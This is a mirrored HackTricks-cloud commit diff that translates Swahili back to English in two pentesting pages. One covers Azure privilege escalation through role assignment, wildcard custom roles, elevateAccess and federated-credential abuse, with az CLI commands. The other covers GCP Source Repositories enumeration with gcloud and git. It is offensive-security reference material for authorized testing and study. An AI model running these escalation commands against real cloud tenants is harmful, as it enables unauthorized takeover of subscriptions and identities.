gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-11 04:33:31 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-cloud/azure-security/az-privilege-escalation

Browse Source
This commit is contained in:
Translator
2025-01-09 01:06:17 +00:00
parent e26633c547
commit 54ff24834b
2 changed files with 58 additions and 41 deletions
Download Patch File Download Diff File Expand all files Collapse all files

58
src/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md
View File

@@ -4,7 +4,7 @@
## Azure IAM
Kwa maelezo zaidi angalia:
Fore more information check:
{{#ref}}
../az-services/az-azuread.md
@@ -12,38 +12,45 @@ Kwa maelezo zaidi angalia:
### Microsoft.Authorization/roleAssignments/write
Ruhusa hii inaruhusu kupewa majukumu kwa wahusika juu ya upeo maalum, ikimruhusu mshambuliaji kupandisha hadhi kwa kujipatia jukumu lenye mamlaka zaidi:
This permission allows to assign roles to principals over a specific scope, allowing an attacker to escalate privileges by assigning himself a more privileged role:
```bash
# Example
az role assignment create --role Owner --assignee "24efe8cf-c59e-45c2-a5c7-c7e552a07170" --scope "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.KeyVault/vaults/testing-1231234"
```
### Microsoft.Authorization/roleDefinitions/Write
Ruhusa hii inaruhusu kubadilisha ruhusa zilizotolewa na jukumu, ikimruhusu mshambuliaji kupandisha hadhi kwa kutoa ruhusa zaidi kwa jukumu aliloteua.
This permission allows to modify the permissions granted by a role, allowing an attacker to escalate privileges by granting more permissions to a role he has assigned.
Create the file `role.json` with the following **content**:
Unda faili `role.json` yenye **maudhui** yafuatayo:
```json
{
"Name": "<name of the role>",
"IsCustom": true,
"Description": "Custom role with elevated privileges",
"Actions": ["*"],
"NotActions": [],
"DataActions": ["*"],
"NotDataActions": [],
"AssignableScopes": ["/subscriptions/<subscription-id>"]
"Name": "<name of the role>",
"IsCustom": true,
"Description": "Custom role with elevated privileges",
"Actions": ["*"],
"NotActions": [],
"DataActions": ["*"],
"NotDataActions": [],
"AssignableScopes": ["/subscriptions/<subscription-id>"]
}
```
Kisha sasisha ruhusa za jukumu kwa ufafanuzi wa awali ukitumia:
Then update the role permissions with the previous definition calling:
```bash
az role definition update --role-definition role.json
```
### Microsoft.Authorization/elevateAccess/action
Ruhusa hii inaruhusu kuinua mamlaka na kuwa na uwezo wa kutoa ruhusa kwa mtu yeyote kwa rasilimali za Azure. Imeandaliwa kutolewa kwa Wasimamizi wa Kimataifa wa Entra ID ili waweze pia kusimamia ruhusa juu ya rasilimali za Azure.
This permissions allows to elevate privileges and be able to assign permissions to any principal to Azure resources. It's meant to be given to Entra ID Global Administrators so they can also manage permissions over Azure resources.
> [!TIP]
> Nadhani mtumiaji anahitaji kuwa Msimamizi wa Kimataifa katika Entra ID ili wito wa kuinua ufanye kazi.
> I think the user need to be Global Administrator in Entrad ID for the elevate call to work.
```bash
# Call elevate
az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01"
@@ -51,22 +58,27 @@ az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Au
# Grant a user the Owner role
az role assignment create --assignee "<obeject-id>" --role "Owner" --scope "/"
```
### Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write
Ruhusa hii inaruhusu kuongeza akreditivu za Shirikisho kwa utambulisho unaosimamiwa. Mfano, kutoa ufikiaji kwa Github Actions katika repo kwa utambulisho unaosimamiwa. Kisha, inaruhusu **kufikia utambulisho wowote unaosimamiwa ulioelezwa na mtumiaji**.
This permission allows to add Federated credentials to managed identities. E.g. give access to Github Actions in a repo to a managed identity. Then, it allows to **access any user defined managed identity**.
Example command to give access to a repo in Github to the a managed identity:
Mfano wa amri ya kutoa ufikiaji kwa repo katika Github kwa utambulisho unaosimamiwa:
```bash
# Generic example:
az rest --method PUT \
--uri "https://management.azure.com//subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<managed-identity-name>/federatedIdentityCredentials/<name-new-federated-creds>?api-version=2023-01-31" \
--headers "Content-Type=application/json" \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:<org-name>/<repo-name>:ref:refs/heads/<branch-name>","audiences":["api://AzureADTokenExchange"]}}'
--uri "https://management.azure.com//subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<managed-identity-name>/federatedIdentityCredentials/<name-new-federated-creds>?api-version=2023-01-31" \
--headers "Content-Type=application/json" \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:<org-name>/<repo-name>:ref:refs/heads/<branch-name>","audiences":["api://AzureADTokenExchange"]}}'
# Example with specific data:
az rest --method PUT \
--uri "https://management.azure.com//subscriptions/92913047-10a6-2376-82a4-6f04b2d03798/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/funcGithub-id-913c/federatedIdentityCredentials/CustomGH2?api-version=2023-01-31" \
--headers "Content-Type=application/json" \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:carlospolop/azure_func4:ref:refs/heads/main","audiences":["api://AzureADTokenExchange"]}}'
--uri "https://management.azure.com//subscriptions/92913047-10a6-2376-82a4-6f04b2d03798/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/funcGithub-id-913c/federatedIdentityCredentials/CustomGH2?api-version=2023-01-31" \
--headers "Content-Type=application/json" \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:carlospolop/azure_func4:ref:refs/heads/main","audiences":["api://AzureADTokenExchange"]}}'
```
{{#include ../../../banners/hacktricks-training.md}}

41
src/pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md
View File

@@ -4,34 +4,35 @@
## Basic Information <a href="#reviewing-cloud-git-repositories" id="reviewing-cloud-git-repositories"></a>
Google Cloud Source Repositories ni huduma ya **repositi ya Git ya kibinafsi** yenye vipengele kamili na inayoweza kupanuka. Imeundwa ili **kuhifadhi msimbo wako wa chanzo katika mazingira yanayosimamiwa kikamilifu**, ikijumuisha kwa urahisi na zana na huduma nyingine za GCP. Inatoa mahali salama na ya ushirikiano kwa timu kuhifadhi, kusimamia, na kufuatilia msimbo wao.
Google Cloud Source Repositories is a fully-featured, scalable, **private Git repository service**. It's designed to **host your source code in a fully managed environment**, integrating seamlessly with other GCP tools and services. It offers a collaborative and secure place for teams to store, manage, and track their code.
Vipengele muhimu vya Cloud Source Repositories ni pamoja na:
Key features of Cloud Source Repositories include:
1. **Kuhifadhi Git kwa Usimamizi Kamili**: Inatoa kazi zinazofahamika za Git, ikimaanisha unaweza kutumia amri na michakato ya kawaida ya Git.
2. **Ujumuishaji na Huduma za GCP**: Inajumuisha na huduma nyingine za GCP kama Cloud Build, Pub/Sub, na App Engine kwa ufuatiliaji wa mwisho hadi mwisho kutoka kwa msimbo hadi kutekelezwa.
3. **Repositi za Kibinafsi**: Inahakikisha msimbo wako unahifadhiwa kwa usalama na kwa faragha. Unaweza kudhibiti ufikiaji kwa kutumia majukumu ya Cloud Identity na Access Management (IAM).
4. **Analizi ya Msimbo wa Chanzo**: Inafanya kazi na zana nyingine za GCP kutoa uchambuzi wa kiotomatiki wa msimbo wako wa chanzo, ikitambua masuala yanayoweza kutokea kama makosa, udhaifu, au mbinu mbaya za uandishi wa msimbo.
5. **Zana za Ushirikiano**: Inasaidia uandishi wa msimbo kwa ushirikiano kwa kutumia zana kama maombi ya kuungana, maoni, na mapitio.
6. **Msaada wa Kioo**: Inakuruhusu kuunganisha Cloud Source Repositories na repositi zinazohifadhiwa kwenye GitHub au Bitbucket, ikiruhusu usawazishaji wa kiotomatiki na kutoa mtazamo mmoja wa repositi zako zote.
1. **Fully Managed Git Hosting**: Offers the familiar functionality of Git, meaning you can use regular Git commands and workflows.
2. **Integration with GCP Services**: Integrates with other GCP services like Cloud Build, Pub/Sub, and App Engine for end-to-end traceability from code to deployment.
3. **Private Repositories**: Ensures your code is stored securely and privately. You can control access using Cloud Identity and Access Management (IAM) roles.
4. **Source Code Analysis**: Works with other GCP tools to provide automated analysis of your source code, identifying potential issues like bugs, vulnerabilities, or bad coding practices.
5. **Collaboration Tools**: Supports collaborative coding with tools like merge requests, comments, and reviews.
6. **Mirror Support**: Allows you to connect Cloud Source Repositories with repositories hosted on GitHub or Bitbucket, enabling automatic synchronization and providing a unified view of all your repositories.
### OffSec information <a href="#reviewing-cloud-git-repositories" id="reviewing-cloud-git-repositories"></a>
- Usanidi wa repositi za chanzo ndani ya mradi utakuwa na **Akaunti ya Huduma** inayotumika kutuma ujumbe wa Cloud Pub/Sub. Moja ya kawaida inayotumika ni **Compute SA**. Hata hivyo, **sidhani kama inawezekana kuiba token yake** kutoka Source Repositories kwani inatekelezwa kwa nyuma.
- Ili kuona msimbo ndani ya konsoli ya wavuti ya GCP Cloud Source Repositories ([https://source.cloud.google.com/](https://source.cloud.google.com/)), unahitaji msimbo uwe **ndani ya tawi la master kwa kawaida**.
- Unaweza pia **kuunda repositi ya kioo ya Cloud** ikielekeza kwenye repo kutoka **Github** au **Bitbucket** (ukitoa ufikiaji kwa majukwaa hayo).
- Inawezekana **kuandika na kutatua matatizo kutoka ndani ya GCP**.
- Kwa kawaida, Source Repositories **inaepuka funguo za kibinafsi kuingizwa katika commits**, lakini hii inaweza kuzuiliwa.
- The source repositories configuration inside a project will have a **Service Account** used to publishing Cloud Pub/Sub messages. The default one used is the **Compute SA**. However, **I don't think it's possible steal its token** from Source Repositories as it's being executed in the background.
- To see the code inside the GCP Cloud Source Repositories web console ([https://source.cloud.google.com/](https://source.cloud.google.com/)), you need the code to be **inside master branch by default**.
- You can also **create a mirror Cloud Repository** pointing to a repo from **Github** or **Bitbucket** (giving access to those platforms).
- It's possible to **code & debug from inside GCP**.
- By default, Source Repositories **prevents private keys to be pushed in commits**, but this can be disabled.
### Open In Cloud Shell
Inawezekana kufungua repositi katika Cloud Shell, ujumbe kama huu utaonekana:
It's possible to open the repository in Cloud Shell, a prompt like this one will appear:
<figure><img src="../../../images/image (325).png" alt=""><figcaption></figcaption></figure>
Hii itakuruhusu kuandika na kutatua matatizo katika Cloud Shell (ambayo inaweza kuathiriwa).
This will allow you to code and debug in Cloud Shell (which could get cloudshell compromised).
### Enumeration
```bash
# Repos enumeration
gcloud source repos list #Get names and URLs
@@ -42,7 +43,7 @@ gcloud source repos get-iam-policy <repo_name>
gcloud source repos clone <REPO NAME>
gcloud source repos get-iam-policy <REPO NAME>
... git add & git commit -m ...
git push --set-upstream origin master
git push --set-upstream origin $BRANCH
git push -u origin master
# Access via git
@@ -50,16 +51,20 @@ git push -u origin master
git clone ssh://username@domain.com@source.developers.google.com:2022/p/<proj-name>/r/<repo-name>
git add, commit, push...
```
### Kuinua Mamlaka & Baada ya Kutekeleza
### Privilege Escalation & Post Exploitation
{{#ref}}
../gcp-privilege-escalation/gcp-sourcerepos-privesc.md
{{#endref}}
### Enum Isiyo na Uthibitisho
### Unauthenticated Enum
{{#ref}}
../gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}